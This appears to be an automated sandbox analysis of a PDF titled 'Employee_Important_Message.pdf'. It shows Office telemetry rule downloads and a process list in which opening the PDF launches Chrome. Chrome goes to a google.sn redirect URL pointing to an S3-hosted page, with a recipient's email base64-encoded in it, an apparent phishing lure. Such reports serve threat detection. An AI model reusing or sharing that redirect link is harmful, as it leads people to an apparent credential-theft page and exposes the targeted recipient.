                                                          2024-12-02 16:57:04 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          141192.168.2.44989913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:03 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:04 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1378
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                          ETag: "0x8DC582BDB813B3F"
                                                          x-ms-request-id: 22785ae5-e01e-0003-78b2-420fa8000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165704Z-174f7845968vqt9xhC1EWRgten00000014p000000000tc24
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:04 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          142192.168.2.44990013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:04 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:04 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1405
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                          ETag: "0x8DC582BE89A8F82"
                                                          x-ms-request-id: 562f2249-001e-0028-5dab-42c49f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165704Z-174f78459685m244hC1EWRgp2c00000014hg00000000deg7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:04 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          143192.168.2.44990113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:04 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:05 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1368
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                          ETag: "0x8DC582BE51CE7B3"
                                                          x-ms-request-id: 21a32f9a-a01e-003d-21b4-4298d7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165704Z-174f7845968kvnqxhC1EWRmf3g0000000rhg000000009qy8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:05 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          144192.168.2.44990213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:05 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:05 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:05 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1415
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                          ETag: "0x8DC582BDCE9703A"
                                                          x-ms-request-id: 5e2e43e0-a01e-0002-3ba3-435074000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165705Z-174f7845968pght8hC1EWRyvxg00000007x000000000778x
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:05 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          145192.168.2.44990313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:06 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:06 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:06 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1378
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                          ETag: "0x8DC582BE584C214"
                                                          x-ms-request-id: dbe9ef63-901e-005b-3a83-3f2005000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165706Z-174f7845968nxc96hC1EWRspw800000014d000000000mc0q
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:06 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          146192.168.2.44990413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:06 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:06 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:06 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1407
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                          ETag: "0x8DC582BE687B46A"
                                                          x-ms-request-id: 56289a14-001e-0028-02a9-42c49f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165706Z-174f7845968nxc96hC1EWRspw800000014k00000000017y7
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:06 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          147192.168.2.44990513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:06 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:06 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:06 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1370
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                          ETag: "0x8DC582BDE62E0AB"
                                                          x-ms-request-id: 3a28b270-401e-00ac-75b5-430a97000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165706Z-174f7845968pf68xhC1EWRr4h800000014wg00000000q0dn
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:06 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          148192.168.2.44990613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:06 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:07 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1397
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                          ETag: "0x8DC582BE156D2EE"
                                                          x-ms-request-id: 581112ab-301e-0000-7391-3feecc000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165707Z-174f7845968kvnqxhC1EWRmf3g0000000rk00000000083cw
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:07 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          149192.168.2.44990713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:07 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:07 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1360
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                          ETag: "0x8DC582BEDC8193E"
                                                          x-ms-request-id: e09bbfae-501e-00a0-6a93-439d9f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165707Z-174f7845968zgtf6hC1EWRqd8s0000000xhg00000000wc0w
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:07 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:11:55:02
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
                                                          Imagebase:0x7ff6bc1b0000
                                                          File size:5'641'176 bytes
                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:11:55:03
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                          Imagebase:0x7ff74bb60000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:11:55:03
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1616,i,3436419427165153113,17725779986340987366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                          Imagebase:0x7ff74bb60000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:11:55:06
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.google.sn/url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bGhlYXJkQHdjLmNvbQ==
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:11:55:07
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1960,i,2475792775790874993,11739866391639367341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
